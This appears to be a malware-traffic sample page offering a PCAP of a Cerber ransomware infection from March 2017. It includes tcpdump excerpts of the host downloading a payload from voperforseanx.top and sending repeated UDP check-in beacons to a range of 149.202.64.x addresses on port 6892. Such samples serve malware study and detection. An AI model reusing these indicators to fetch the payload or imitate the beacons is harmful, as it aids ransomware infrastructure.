CERBER Ransomware voperforseanx.top 2.gif Malware Analysis PCAP file Download Traffic Sample

Attachment: pcap 2gif
Date added: March 25, 2017 2:15 am. Added by: admin. File size: 377 KB.

2017-03-24 21:33:08.433085 IP 192.168.1.102.52862 > 47.90.205.113.80: Flags [P.], seq 0:296, ack 1, win 256, length 296: HTTP: GET /user.php?f=2.gif HTTP/1.1
E..P.F@…+….f/Z.q.~.P…….gP…7K..GET /user.php?f=2.gif HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: voperforseanx.top
Connection: Keep-Alive

 

2017-03-24 21:34:18.965418 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 84798, win 32768, length 0
E..(2.@…s….f.O……1.B…b^P…R………
2017-03-24 21:34:18.965823 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 86258, win 32768, length 0
E..(2.@…s….f.O……1.B…h.P…M………
2017-03-24 21:34:18.966006 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 87718, win 32768, length 0
E..(2.@…s….f.O……1.B…m.P…GM……..
2017-03-24 21:34:18.969465 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 89178, win 32768, length 0
E..(2.@…s….f.O……1.B…szP…A………
2017-03-24 21:34:18.969858 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 90638, win 32768, length 0
E..(2.@…s….f.O……1.B…y.P…;………
2017-03-24 21:34:18.969871 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 91215, win 32695, length 0
E..(2.@…s….f.O……1.B…{oP…9………
2017-03-24 21:34:31.818161 IP 192.168.1.102.56966 > 149.202.64.0.6892: UDP, length 27
E..7.t…..i…f..@……#.(e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818169 IP 192.168.1.102.56966 > 149.202.64.1.6892: UDP, length 27
E..7n…..5….f..@……#.’e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818170 IP 192.168.1.102.56966 > 149.202.64.2.6892: UDP, length 27
E..7;*….h….f..@……#.&e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818260 IP 192.168.1.102.56966 > 149.202.64.3.6892: UDP, length 27
E..7]…..FG…f..@……#.%e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818268 IP 192.168.1.102.56966 > 149.202.64.4.6892: UDP, length 27
E..7Q…..Q….f..@……#.$e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818300 IP 192.168.1.102.56966 > 149.202.64.5.6892: UDP, length 27
E..77g….lq…f..@……#.#e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818312 IP 192.168.1.102.56966 > 149.202.64.6.6892: UDP, length 27
E..7b…..AK…f..@……#.”e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818402 IP 192.168.1.102.56966 > 149.202.64.7.6892: UDP, length 27
E..7.E………f..@……#.!e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818405 IP 192.168.1.102.56966 > 149.202.64.8.6892: UDP, length 27
E..7d…..?*…f..@……#. e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818468 IP 192.168.1.102.56966 > 149.202.64.9.6892: UDP, length 27
E..7.$………f..@     …..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818471 IP 192.168.1.102.56966 > 149.202.64.10.6892: UDP, length 27
E..7X   ….K….f..@
…..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818521 IP 192.168.1.102.56966 > 149.202.64.11.6892: UDP, length 27
E..71R….r….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818593 IP 192.168.1.102.56966 > 149.202.64.12.6892: UDP, length 27
E..7=…..f….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818621 IP 192.168.1.102.56966 > 149.202.64.13.6892: UDP, length 27
E..7[…..H….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818623 IP 192.168.1.102.56966 > 149.202.64.14.6892: UDP, length 27
E..7._…..p…f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818705 IP 192.168.1.102.56966 > 149.202.64.15.6892: UDP, length 27
E..7h…..:….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818706 IP 192.168.1.102.56966 > 149.202.64.16.6892: UDP, length 27
E..7>/….e….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818786 IP 192.168.1.102.56966 > 149.202.64.17.6892: UDP, length 27
E..7X…..K….f..@……#..e008b81bf47e0446950100000f9
